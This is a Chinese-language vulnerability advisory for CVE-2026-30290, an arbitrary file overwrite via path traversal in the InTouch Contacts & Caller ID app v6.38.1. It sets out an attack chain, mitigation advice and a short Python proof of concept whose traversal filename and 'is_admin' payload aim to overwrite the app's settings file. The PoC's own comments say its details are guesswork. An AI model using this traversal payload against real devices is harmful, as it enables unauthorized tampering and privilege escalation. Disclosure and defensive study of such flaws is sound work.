CVE-2026-30290 CVSS 8.4 高危

CVE-2026-30290 InTouch Contacts 任意文件覆盖漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30290

漏洞类型

任意文件覆盖

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

InTouch Contacts & Caller ID APP

漏洞概述

InTouch Contacts & Caller ID APP v6.38.1存在严重的任意文件覆盖漏洞。攻击者无需任何用户交互或权限认证，即可利用应用程序的文件导入流程，恶意覆盖系统内部的敏感文件。此漏洞可能导致攻击者在目标设备上执行任意代码，造成信息泄露或系统完全被控，CVSS评分高达8.4，风险极高。

技术细节

该漏洞源于InTouch Contacts & Caller ID APP的文件导入模块对输入数据的校验存在严重缺陷。当应用程序处理用户导入的联系人数据或配置文件时，未能正确限制写入路径，导致存在路径遍历漏洞。攻击者可以精心构建恶意文件，利用路径遍历字符（如../../）将文件指针重定向到应用程序沙箱之外的敏感系统目录。通过覆盖关键内部文件（如动态链接库so文件、dex文件或配置文件），攻击者能够劫持应用程序的执行流或修改系统行为，最终实现本地权限提升、任意代码执行或窃取隐私信息。鉴于无需认证和交互即可利用，该漏洞对本地数据安全构成极大威胁。

攻击链分析

STEP 1

侦察

确认目标设备上安装了InTouch Contacts & Caller ID APP v6.38.1。

STEP 2

武器化

构造包含路径遍历字符（如../）的恶意文件，旨在覆盖关键内部文件。

STEP 3

投递

将恶意文件传输到目标移动设备。

STEP 4

利用

在APP中触发文件导入功能，处理恶意文件。

STEP 5

执行

APP将数据写入预定路径，覆盖系统文件，导致代码执行或信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os

# PoC for CVE-2026-30290: Arbitrary File Overwrite via File Import
# Description: This script generates a malicious file intended to overwrite
# a critical internal file via path traversal when imported by the vulnerable app.

def generate_poc():
    # Define the target internal file path using path traversal sequences
    # Note: The actual path depends on the app's data directory structure.
    traversal_sequence = "../../../data/data/com.intouch.app/shared_prefs/settings.xml"
    
    # Malicious content to be written (e.g., enabling admin privileges)
    payload = "<boolean name='is_admin' value='true'/>"
    
    # Create a file with the traversal sequence in the name or content
    # Depending on the specific implementation details of the import function.
    poc_filename = f"contacts_backup_{traversal_sequence}.xml"
    
    with open(poc_filename, 'w') as f:
        f.write(payload)
        
    print(f"[+] PoC file generated: {poc_filename}")
    print(f"[+] Attempting to overwrite: {traversal_sequence}")
    print("[+] Upload this file to the device and import it via InTouch App.")

if __name__ == "__main__":
    generate_poc()

影响范围

InTouch Contacts & Caller ID APP v6.38.1

防御指南

临时缓解措施

建议用户立即将InTouch Contacts & Caller ID APP更新至最新版本以修复此漏洞。在更新前，应避免从不可信来源导入文件，并限制该应用的存储访问权限。企业用户应部署移动设备管理（MDM）策略，检测并阻止旧版本应用的运行。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-30290
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-30290
3 Details https://www.cvedetails.com/cve/CVE-2026-30290/
4 VulDB https://vuldb.com/cve/CVE-2026-30290
5 Link https://github.com/Secsys-FDU/AF_CVEs/issues/19
6 Link https://secsys.fudan.edu.cn/
7 Link https://www.intouchapp.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表